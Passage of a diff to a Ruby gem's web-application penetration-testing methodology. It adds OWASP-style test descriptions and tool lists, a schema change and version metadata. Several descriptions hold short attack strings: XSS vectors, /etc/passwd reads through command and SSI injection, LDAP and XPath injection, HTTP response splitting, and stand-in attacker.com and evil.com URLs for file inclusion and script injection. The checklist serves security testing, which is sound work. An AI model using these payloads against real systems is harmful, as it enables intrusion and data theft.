"caption": "OTG-SESS-007, WAHHM - Test Handling of Access",
|
|
404
|
+
"description": "Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.",
|
|
405
|
+
"tools": "Burp Proxy, ZAP",
|
|
314
406
|
"vrt_category": "broken_authentication_and_session_management"
|
|
315
407
|
},
|
|
316
408
|
{
|
|
317
409
|
"key": "puzzling",
|
|
318
410
|
"title": "Testing for Session puzzling",
|
|
319
|
-
"
|
|
411
|
+
"caption": "OTG-SESS-008, WAHHM - Test Handling of Access",
|
|
412
|
+
"description": "The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.",
|
|
413
|
+
"tools": "Burp Proxy, ZAP",
|
|
320
414
|
"vrt_category": "broken_authentication_and_session_management"
|
|
321
415
|
}
|
|
322
416
|
]
|
|
@@ -329,151 +423,205 @@
|
|
|
329
423
|
{
|
|
330
424
|
"key": "reflected_xss",
|
|
331
425
|
"title": "Testing for Reflected Cross Site Scripting",
|
|
332
|
-
"
|
|
426
|
+
"caption": "OTG-INPVAL-001, WAHHM - Test Handling of Input",
|
|
427
|
+
"description": "Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.",
|
|
428
|
+
"tools": "Burp Proxy, ZAP, Xenotix XSS"
|
|
333
429
|
},
|
|
334
430
|
{
|
|
335
431
|
"key": "stored_xss",
|
|
336
432
|
"title": "Testing for Stored Cross Site Scripting",
|
|
337
|
-
"
|
|
433
|
+
"caption": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
|
|
434
|
+
"description": "Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF",
|
|
435
|
+
"tools": "Burp Proxy, ZAP, BeEF, XSS Proxy",
|
|
338
436
|
"vrt_category": "cross_site_scripting_xss"
|
|
339
437
|
},
|
|
340
438
|
{
|
|
341
439
|
"key": "http_verb_tampering",
|
|
342
440
|
"title": "Testing for HTTP Verb Tampering",
|
|
343
|
-
"
|
|
441
|
+
"caption": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
|
|
442
|
+
"description": "Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.",
|
|
443
|
+
"tools": "netcat",
|
|
344
444
|
"vrt_category": "server_security_misconfiguration"
|
|
345
445
|
},
|
|
346
446
|
{
|
|
347
447
|
"key": "http_param_pollution",
|
|
348
448
|
"title": "Testing for HTTP Parameter pollution",
|
|
349
|
-
"
|
|
449
|
+
"caption": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
|
|
450
|
+
"description": "Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP",
|
|
451
|
+
"tools": "ZAP, HPP Finder (Chrome Plugin)",
|
|
350
452
|
"vrt_category": "server_side_injection"
|
|
351
453
|
},
|
|
352
454
|
{
|
|
353
455
|
"key": "sql_injection",
|
|
354
456
|
"title": "Testing for SQL Injection",
|
|
355
|
-
"
|
|
457
|
+
"caption": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
|
|
458
|
+
"description": "Union, Boolean, Error based, Out-of-band, Time delay.",
|
|
459
|
+
"tools": "Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)",
|
|
356
460
|
"vrt_category": "server_side_injection"
|
|
357
461
|
},
|
|
358
462
|
{
|
|
359
463
|
"key": "oracle",
|
|
360
464
|
"title": "Oracle Testing",
|
|
361
|
-
"
|
|
465
|
+
"caption": "",
|
|
466
|
+
"description": "Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection",
|
|
467
|
+
"tools": "Orascan, SQLInjector"
|
|
362
468
|
},
|
|
363
469
|
{
|
|
364
470
|
"key": "mysql",
|
|
365
471
|
"title": "MySQL Testing",
|
|
366
|
-
"
|
|
472
|
+
"caption": "",
|
|
473
|
+
"description": "Identify MySQL version, Single quote, Information_schema, Read/Write file.",
|
|
474
|
+
"tools": "SQLMap, Mysqloit, Power Injector"
|
|
367
475
|
},
|
|
368
476
|
{
|
|
369
477
|
"key": "sql_server",
|
|
370
478
|
"title": "SQL Server Testing",
|
|
371
|
-
"
|
|
479
|
+
"caption": "",
|
|
480
|
+
"description": "Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)",
|
|
481
|
+
"tools": "SQLMap, SQLninja, Power Injector"
|
|
372
482
|
},
|
|
373
483
|
{
|
|
374
484
|
"key": "postgre_sql",
|
|
375
485
|
"title": "Testing PostgreSQL",
|
|
376
|
-
"
|
|
486
|
+
"caption": "",
|
|
487
|
+
"description": "Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)",
|
|
488
|
+
"tools": "SQLMap"
|
|
377
489
|
},
|
|
378
490
|
{
|
|
379
491
|
"key": "ms_access",
|
|
380
492
|
"title": "MS Access Testing",
|
|
381
|
-
"
|
|
493
|
+
"caption": "",
|
|
494
|
+
"description": "Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.",
|
|
495
|
+
"tools": "SQLMap"
|
|
382
496
|
},
|
|
383
497
|
{
|
|
384
498
|
"key": "nosql_injection",
|
|
385
499
|
"title": "Testing for NoSQL injection",
|
|
386
|
-
"
|
|
500
|
+
"caption": "",
|
|
501
|
+
"description": "dentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.",
|
|
502
|
+
"tools": "NoSQLMap"
|
|
387
503
|
},
|
|
388
504
|
{
|
|
389
505
|
"key": "ldap_injection",
|
|
390
506
|
"title": "Testing for LDAP Injection",
|
|
391
|
-
"
|
|
507
|
+
"caption": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
|
|
508
|
+
"description": "/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=password",
|
|
509
|
+
"tools": "Burp Proxy, ZAP",
|
|
392
510
|
"vrt_category": "server_side_injection"
|
|
393
511
|
},
|
|
394
512
|
{
|
|
395
513
|
"key": "orm_injection",
|
|
396
514
|
"title": "Testing for ORM Injection",
|
|
397
|
-
"
|
|
515
|
+
"caption": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
|
|
516
|
+
"description": "Testing ORM injection is identical to SQL injection testing",
|
|
517
|
+
"tools": "Hibernate, Nhibernate",
|
|
398
518
|
"vrt_category": "server_side_injection"
|
|
399
519
|
},
|
|
400
520
|
{
|
|
401
521
|
"key": "xml_injection",
|
|
402
522
|
"title": "Testing for XML Injection",
|
|
403
|
-
"
|
|
523
|
+
"caption": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
|
|
524
|
+
"description": "Check with XML Meta Characters', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG",
|
|
525
|
+
"tools": "Burp Proxy, ZAP, Wfuzz",
|
|
404
526
|
"vrt_category": "server_side_injection"
|
|
405
527
|
},
|
|
406
528
|
{
|
|
407
529
|
"key": "ssi_injection",
|
|
408
530
|
"title": "Testing for SSI Injection",
|
|
409
|
-
"
|
|
531
|
+
"caption": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
|
|
532
|
+
"description": "Presence of .shtml extension, Check for these characters, < ! # = / . \" - > and [a-zA-Z0-9], include String = <!--#include virtual='/etc/passwd'",
|
|
533
|
+
"tools": "Burp Proxy, ZAP",
|
|
410
534
|
"vrt_category": "server_side_injection"
|
|
411
535
|
},
|
|
412
536
|
{
|
|
413
537
|
"key": "xpath_injection",
|
|
414
538
|
"title": "Testing for XPath Injection",
|
|
415
|
-
"
|
|
539
|
+
"caption": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
|
|
540
|
+
"description": "Check for XML error enumeration by supplying a single quote (').\nUsername: ‘ or ‘1’ = ‘1\nPassword: ‘ or ‘1’ = ‘1",
|
|
541
|
+
"tools": "Burp Proxy, ZAP",
|
|
416
542
|
"vrt_category": "server_side_injection"
|
|
417
543
|
},
|
|
418
544
|
{
|
|
419
545
|
"key": "imap_smtp_injection",
|
|
420
546
|
"title": "IMAP/SMTP Injection",
|
|
421
|
-
"
|
|
547
|
+
"caption": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
|
|
548
|
+
"description": "Identifying vulnerable parameters with special characters (i.e.: \\, ‘, “, @, #, !, |).\nUnderstanding the data flow and deployment structure of the client\nIMAP/SMTP command injection (Header, Body, Footer)",
|
|
549
|
+
"tools": "Burp Proxy, ZAP",
|
|
422
550
|
"vrt_category": "server_side_injection"
|
|
423
551
|
},
|
|
424
552
|
{
|
|
425
553
|
"key": "code_injection",
|
|
426
554
|
"title": "Testing for Code Injection",
|
|
427
|
-
"
|
|
555
|
+
"caption": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
|
|
556
|
+
"description": "Enter OS commands in the input field.?arg=1; system('id')",
|
|
557
|
+
"tools": "Burp Proxy, ZAP, Liffy, Panoptic",
|
|
428
558
|
"vrt_category": "server_side_injection"
|
|
429
559
|
},
|
|
430
560
|
{
|
|
431
561
|
"key": "local_file_inclusion",
|
|
432
562
|
"title": "Testing for Local File Inclusion",
|
|
433
|
-
"
|
|
563
|
+
"caption": "",
|
|
564
|
+
"description": "LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)",
|
|
565
|
+
"tools": "Burp Proxy, fimap, Liffy"
|
|
434
566
|
},
|
|
435
567
|
{
|
|
436
568
|
"key": "remote_file_inclusion",
|
|
437
569
|
"title": "Testing for Remote File Inclusion",
|
|
438
|
-
"
|
|
570
|
+
"caption": "",
|
|
571
|
+
"description": "RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page",
|
|
572
|
+
"tools": "Burp Proxy, fimap, Liffy"
|
|
439
573
|
},
|
|
440
574
|
{
|
|
441
575
|
"key": "command_injection",
|
|
442
576
|
"title": "Testing for Command Injection",
|
|
443
|
-
"
|
|
577
|
+
"caption": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
|
|
578
|
+
"description": "Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\n%3Bcat%20/etc/passwd\ntest.pdf+|+Dir C:\\ ",
|
|
579
|
+
"tools": "Burp Proxy, ZAP, Commix",
|
|
444
580
|
"vrt_category": "server_side_injection"
|
|
445
581
|
},
|
|
446
582
|
{
|
|
447
583
|
"key": "buffer_overflow",
|
|
448
584
|
"title": "Testing for Buffer overflow",
|
|
449
|
-
"
|
|
585
|
+
"caption": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
|
|
586
|
+
"description": "Testing for heap overflow vulnerability\nTesting for stack overflow vulnerability\nTesting for format string vulnerability",
|
|
587
|
+
"tools": "Immunity Canvas, Spike, MSF, Nessus",
|
|
450
588
|
"vrt_category": "server_side_injection"
|
|
451
589
|
},
|
|
452
590
|
{
|
|
453
591
|
"key": "heap_overflow",
|
|
454
592
|
"title": "Testing for Heap overflow",
|
|
455
|
-
"
|
|
593
|
+
"caption": "",
|
|
594
|
+
"description": "",
|
|
595
|
+
"tools": ""
|
|
456
596
|
},
|
|
457
597
|
{
|
|
458
598
|
"key": "stack_overflow",
|
|
459
599
|
"title": "Testing for Stack overflow",
|
|
460
|
-
"
|
|
600
|
+
"caption": "",
|
|
601
|
+
"description": "",
|
|
602
|
+
"tools": ""
|
|
461
603
|
},
|
|
462
604
|
{
|
|
463
605
|
"key": "format_string",
|
|
464
606
|
"title": "Testing for Format string",
|
|
465
|
-
"
|
|
607
|
+
"caption": "",
|
|
608
|
+
"description": "",
|
|
609
|
+
"tools": ""
|
|
466
610
|
},
|
|
467
611
|
{
|
|
468
612
|
"key": "incubated_vulnerabilities",
|
|
469
613
|
"title": "Testing for incubated vulnerabilities",
|
|
470
|
-
"
|
|
614
|
+
"caption": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
|
|
615
|
+
"description": "File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)",
|
|
616
|
+
"tools": "Burp Proxy, BeEF, MSF",
|
|
471
617
|
"vrt_category": "server_security_misconfiguration"
|
|
472
618
|
},
|
|
473
619
|
{
|
|
474
620
|
"key": "http_splitting_and_smuggling",
|
|
475
621
|
"title": "Testing for HTTP Splitting/Smuggling",
|
|
476
|
-
"
|
|
622
|
+
"caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
|
|
623
|
+
"description": "param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>",
|
|
624
|
+
"tools": "Burp Proxy, ZAP, netcat",
|
|
477
625
|
"vrt_category": "server_side_injection"
|
|
478
626
|
}
|
|
479
627
|
]
|
|
@@ -486,13 +634,17 @@
|
|
|
486
634
|
{
|
|
487
635
|
"key": "error_codes",
|
|
488
636
|
"title": "Analysis of Error Codes",
|
|
489
|
-
"
|
|
637
|
+
"caption": "OTG-ERR-001, WAHHM - Recon and Analysis",
|
|
638
|
+
"description": "Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)",
|
|
639
|
+
"tools": "Burp Proxy, ZAP",
|
|
490
640
|
"vrt_category": "server_security_misconfiguration"
|
|
491
641
|
},
|
|
492
642
|
{
|
|
493
643
|
"key": "stack_traces",
|
|
494
644
|
"title": "Analysis of Stack Traces",
|
|
495
|
-
"
|
|
645
|
+
"caption": "OTG-ERR-002, WAHHM - Recon and Analysis",
|
|
646
|
+
"description": "Invalid Input / Empty inputs. Input that contains non alphanumeric characters or query syntax. Access to internal pages without authentication. Bypassing application flow.",
|
|
647
|
+
"tools": "Burp Proxy, ZAP",
|
|
496
648
|
"vrt_category": "server_security_misconfiguration"
|
|
497
649
|
}
|
|
498
650
|
]
|
|
@@ -505,19 +657,25 @@
|
|
|
505
657
|
{
|
|
506
658
|
"key": "transport_layer_protection",
|
|
507
659
|
"title": "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection",
|
|
508
|
-
"
|
|
660
|
+
"caption": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
|
|
661
|
+
"description": "Identify SSL service, Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)",
|
|
662
|
+
"tools": "testssl.sh, SSL Breacher",
|
|
509
663
|
"vrt_category": "server_security_misconfiguration"
|
|
510
664
|
},
|
|
511
665
|
{
|
|
512
666
|
"key": "padding_oracle",
|
|
513
667
|
"title": "Testing for Padding Oracle",
|
|
514
|
-
"
|
|
668
|
+
"caption": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
|
|
669
|
+
"description": "Compare the responses in three different states:\nCipher text gets decrypted, resulting data is correct.\nCipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.\nCipher text decryption fails due to padding errors.",
|
|
670
|
+
"tools": "PadBuster, Poracle, python-paddingoracle, POET",
|
|
515
671
|
"vrt_category": "broken_authentication_and_session_management"
|
|
516
672
|
},
|
|
517
673
|
{
|
|
518
674
|
"key": "unencrypted_channels",
|
|
519
675
|
"title": "Testing for Sensitive information sent via unencrypted channels",
|
|
520
|
-
"
|
|
676
|
+
"caption": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
|
|
677
|
+
"description": "Check sensitive data during the transmission:\nInformation used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)\nInformation protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)",
|
|
678
|
+
"tools": "Burp Proxy, ZAP, Curl",
|
|
521
679
|
"vrt_category": "broken_authentication_and_session_management"
|
|
522
680
|
}
|
|
523
681
|
]
|
|
@@ -530,53 +688,71 @@
|
|
|
530
688
|
{
|
|
531
689
|
"key": "data_validation",
|
|
532
690
|
"title": "Test Business Logic Data Validation",
|
|
533
|
-
"
|
|
691
|
+
"caption": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
|
|
692
|
+
"description": "Looking for data entry points or hand off points between systems or software.\nOnce found try to insert logically invalid data into the application/system.",
|
|
693
|
+
"tools": "Burp Proxy, ZAP",
|
|
534
694
|
"vrt_category": "broken_access_control"
|
|
535
695
|
},
|
|
536
696
|
{
|
|
537
697
|
"key": "forge_requests",
|
|
538
698
|
"title": "Test Ability to Forge Requests",
|
|
539
|
-
"
|
|
699
|
+
"caption": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
|
|
700
|
+
"description": "Looking for guessable, predictable or hidden functionality of fields.\nOnce found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.",
|
|
701
|
+
"tools": "Burp Proxy, ZAP",
|
|
540
702
|
"vrt_category": "server_side_injection"
|
|
541
703
|
},
|
|
542
704
|
{
|
|
543
705
|
"key": "integrity_check",
|
|
544
706
|
"title": "Test Integrity Checks",
|
|
545
|
-
"
|
|
707
|
+
"caption": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
|
|
708
|
+
"description": "Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\nFor each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\nAttempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the business logic workflow.",
|
|
709
|
+
"tools": "Burp Proxy, ZAP",
|
|
546
710
|
"vrt_category": "broken_access_control"
|
|
547
711
|
},
|
|
548
712
|
{
|
|
549
713
|
"key": "process_timing",
|
|
550
714
|
"title": "Test for Process Timing",
|
|
551
|
-
"
|
|
715
|
+
"caption": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
|
|
716
|
+
"description": "Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.\nDevelop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing.",
|
|
717
|
+
"tools": "Burp Proxy, ZAP",
|
|
552
718
|
"vrt_category": "server_side_injection"
|
|
553
719
|
},
|
|
554
720
|
{
|
|
555
721
|
"key": "usage_limits",
|
|
556
722
|
"title": "Test Number of Times a Function Can be Used Limits",
|
|
557
|
-
"
|
|
723
|
+
"caption": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
|
|
724
|
+
"description": "Looking for functions or features in the application or system that should not be executed more than a single time or specified number of times during the business logic workflow.\nFor each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.",
|
|
725
|
+
"tools": "Burp Proxy, ZAP",
|
|
558
726
|
"vrt_category": "broken_access_control"
|
|
559
727
|
},
|
|
560
728
|
{
|
|
561
729
|
"key": "workflow_circumvention",
|
|
562
730
|
"title": "Testing for the Circumvention of Work Flows",
|
|
563
|
-
"
|
|
731
|
+
"caption": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
|
|
732
|
+
"description": "Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\nFor each method develop a misuse case and try to circumvent or perform an action that is 'not acceptable' per the business logic workflow.",
|
|
733
|
+
"tools": "Burp Proxy, ZAP",
|
|
564
734
|
"vrt_category": "broken_access_control"
|
|
565
735
|
},
|
|
566
736
|
{
|
|
567
737
|
"key": "application_misuse",
|
|
568
738
|
"title": "Test Defenses Against Application Mis-use",
|
|
569
|
-
"
|
|
739
|
+
"caption": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws",
|
|
740
|
+
"description": "Measures that might indicate the application has in-built self-defense:\nChanged responses, Blocked requests, Actions that log a user out or lock their account",
|
|
741
|
+
"tools": "Burp Proxy, ZAP"
|
|
570
742
|
},
|
|
571
743
|
{
|
|
572
744
|
"key": "upload_unexpected_files",
|
|
573
745
|
"title": "Test Upload of Unexpected File Types",
|
|
574
|
-
"
|
|
746
|
+
"caption": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws",
|
|
747
|
+
"description": "Review the project documentation and perform some exploratory testing looking for file types that should be 'unsupported' by the application/system.\nTry to upload these “unsupported” files and verify that they are properly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. PS. file.phtml, shell.phPWND, SHELL~1.PHP",
|
|
748
|
+
"tools": "Burp Proxy, ZAP"
|
|
575
749
|
},
|
|
576
750
|
{
|
|
577
751
|
"key": "malicious_files",
|
|
578
752
|
"title": "Test Upload of Malicious Files",
|
|
579
|
-
"
|
|
753
|
+
"caption": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
|
|
754
|
+
"description": " Develop or acquire a known “malicious” file.\nTry to upload the malicious file to the application/system and verify that it is correctly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.",
|
|
755
|
+
"tools": "Burp Proxy, ZAP",
|
|
580
756
|
"vrt_category": "server_security_misconfiguration"
|
|
581
757
|
}
|
|
582
758
|
]
|
|
@@ -589,72 +765,96 @@
|
|
|
589
765
|
{
|
|
590
766
|
"key": "dom_based_xss",
|
|
591
767
|
"title": "Testing for DOM based Cross Site Scripting",
|
|
592
|
-
"
|
|
768
|
+
"caption": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
|
|
769
|
+
"description": "Test for the user inputs obtained from client-side JavaScript Objects",
|
|
770
|
+
"tools": "Burp Proxy, DOMinator",
|
|
593
771
|
"vrt_category": "cross_site_scripting_xss"
|
|
594
772
|
},
|
|
595
773
|
{
|
|
596
774
|
"key": "javascript_execution",
|
|
597
775
|
"title": "Testing for JavaScript Execution",
|
|
598
|
-
"
|
|
776
|
+
"caption": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
|
|
777
|
+
"description": "Inject JavaScript code:\nwww.victim.com/?javascript:alert(1)",
|
|
778
|
+
"tools": "Burp Proxy, ZAP",
|
|
599
779
|
"vrt_category": "cross_site_scripting_xss"
|
|
600
780
|
},
|
|
601
781
|
{
|
|
602
782
|
"key": "html_injection",
|
|
603
783
|
"title": "Testing for HTML Injection",
|
|
604
|
-
"
|
|
784
|
+
"caption": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
|
|
785
|
+
"description": "Send malicious HTML code:\n?user=<img%20src='aaa'%20onerror=alert(1)>",
|
|
786
|
+
"tools": "Burp Proxy, ZAP",
|
|
605
787
|
"vrt_category": "server_side_injection"
|
|
606
788
|
},
|
|
607
789
|
{
|
|
608
790
|
"key": "url_redirect",
|
|
609
791
|
"title": "Testing for Client Side URL Redirect",
|
|
610
|
-
"
|
|
792
|
+
"caption": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
|
|
793
|
+
"description": "Modify untrusted URL input to a malicious site:\n(Open Redirect)?redirect=www.fake-target.site",
|
|
794
|
+
"tools": "Burp Proxy, ZAP",
|
|
611
795
|
"vrt_category": "unvalidated_redirects_and_forwards"
|
|
612
796
|
},
|
|
613
797
|
{
|
|
614
798
|
"key": "css_injection",
|
|
615
799
|
"title": "Testing for CSS Injection",
|
|
616
|
-
"
|
|
800
|
+
"caption": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
|
|
801
|
+
"description": "nject code in the CSS context :\nwww.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])\nwww.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)",
|
|
802
|
+
"tools": "Burp Proxy, ZAP",
|
|
617
803
|
"vrt_category": "server_security_misconfiguration"
|
|
618
804
|
},
|
|
619
805
|
{
|
|
620
806
|
"key": "resource_manipulation",
|
|
621
807
|
"title": "Testing for Client Side Resource Manipulation",
|
|
622
|
-
"
|
|
808
|
+
"caption": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
|
|
809
|
+
"description": "External JavaScript could be easily injected in the trusted web site\nwww.victim.com/#http://evil.com/js.js",
|
|
810
|
+
"tools": "Burp Proxy, ZAP",
|
|
623
811
|
"vrt_category": "server_security_misconfiguration"
|
|
624
812
|
},
|
|
625
813
|
{
|
|
626
814
|
"key": "cors",
|
|
627
815
|
"title": "Test Cross Origin Resource Sharing",
|
|
628
|
-
"
|
|
816
|
+
"caption": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
|
|
817
|
+
"description": "Check the HTTP headers in order to understand how CORS is used (Origin Header)",
|
|
818
|
+
"tools": "Burp Proxy, ZAP",
|
|
629
819
|
"vrt_category": "server_security_misconfiguration"
|
|
630
820
|
},
|
|
631
821
|
{
|
|
632
822
|
"key": "cross_site_flashing",
|
|
633
823
|
"title": "Testing for Cross Site Flashing",
|
|
634
|
-
"
|
|
824
|
+
"caption": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
|
|
825
|
+
"description": "Decompile, Undefined variables, Unsafe methods, Include malicious SWF http://victim/file.swf?lang=http://evil",
|
|
826
|
+
"tools": "FlashBang, Flare, Flasm, SWFScan, SWF Intruder",
|
|
635
827
|
"vrt_category": "server_security_misconfiguration"
|
|
636
828
|
},
|
|
637
829
|
{
|
|
638
830
|
"key": "clickjacking",
|
|
639
831
|
"title": "Testing for Clickjacking",
|
|
640
|
-
"
|
|
832
|
+
"caption": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
|
|
833
|
+
"description": "Discover if a website is vulnerable by loading into an iframe, create a simple web page that includes a frame containing the target.",
|
|
834
|
+
"tools": "Burp Proxy",
|
|
641
835
|
"vrt_category": "server_security_misconfiguration"
|
|
642
836
|
},
|
|
643
837
|
{
|
|
644
838
|
"key": "web_sockets",
|
|
645
839
|
"title": "Testing WebSockets",
|
|
646
|
-
"
|
|
840
|
+
"caption": "OTG-CLIENT-010, WAHHM - Test Handling of Input",
|
|
841
|
+
"description": "Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.\nUse Google Chrome's Developer Tools to view the Network WebSocket communication.\nCheck Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization",
|
|
842
|
+
"tools": "Burp Proxy, Chrome, ZAP, WebSocket Client"
|
|
647
843
|
},
|
|
648
844
|
{
|
|
649
845
|
"key": "web_messaging",
|
|
650
846
|
"title": "Test Web Messaging",
|
|
651
|
-
"
|
|
847
|
+
"caption": "OTG-CLIENT-011, WAHHM - Test Handling of Input",
|
|
848
|
+
"description": "Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains",
|
|
849
|
+
"tools": "Burp Proxy, ZAP"
|
|
652
850
|
},
|
|
653
851
|
{
|
|
654
852
|
"key": "local_storage",
|
|
655
853
|
"title": "Test Local Storage",
|
|
656
|
-
"
|
|
657
|
-
"vrt_category": "server_security_misconfiguration"
|
|
854
|
+
"caption": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
|
|
855
|
+
"vrt_category": "server_security_misconfiguration",
|
|
856
|
+
"description": "Determine whether the website is storing sensitive data in the storage.\nXSS in localstorage http://server/StoragePOC.html#<img src=x onerror=alert(1)>",
|
|
857
|
+
"tools": "Chrome, Firebug, Burp Proxy, ZAP"
|
|
658
858
|
}
|
|
659
859
|
]
|
|
660
860
|
}
|
data/lib/data/0.1/schema.json
CHANGED
|
@@ -42,9 +42,15 @@
|
|
|
42
42
|
"pattern": "^[ a-zA-Z0-9\\-+()\/,.<\\?]*$",
|
|
43
43
|
"minLength": 3
|
|
44
44
|
},
|
|
45
|
+
"caption": {
|
|
46
|
+
"type": "string"
|
|
47
|
+
},
|
|
45
48
|
"description": {
|
|
46
49
|
"type": "string"
|
|
47
50
|
},
|
|
51
|
+
"tools": {
|
|
52
|
+
"type": "string"
|
|
53
|
+
},
|
|
48
54
|
"vrt_category": {
|
|
49
55
|
"type": "string",
|
|
50
56
|
"pattern": "^[a-z_]*$"
|
|
@@ -53,7 +59,7 @@
|
|
|
53
59
|
"required": [
|
|
54
60
|
"key",
|
|
55
61
|
"title",
|
|
56
|
-
"
|
|
62
|
+
"caption"
|
|
57
63
|
]
|
|
58
64
|
},
|
|
59
65
|
"step": {
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: bmt
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.2.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Federico Tagliabue
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2021-
|
|
11
|
+
date: 2021-11-25 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: bundler
|
|
@@ -92,6 +92,8 @@ files:
|
|
|
92
92
|
- lib/bmt/methodology.rb
|
|
93
93
|
- lib/bmt/step.rb
|
|
94
94
|
- lib/bmt/version.rb
|
|
95
|
+
- lib/data/0.1/mappings/templates.json
|
|
96
|
+
- lib/data/0.1/mappings/templates.schema.json
|
|
95
97
|
- lib/data/0.1/methodologies/template.json
|
|
96
98
|
- lib/data/0.1/methodologies/website_testing.json
|
|
97
99
|
- lib/data/0.1/schema.json
|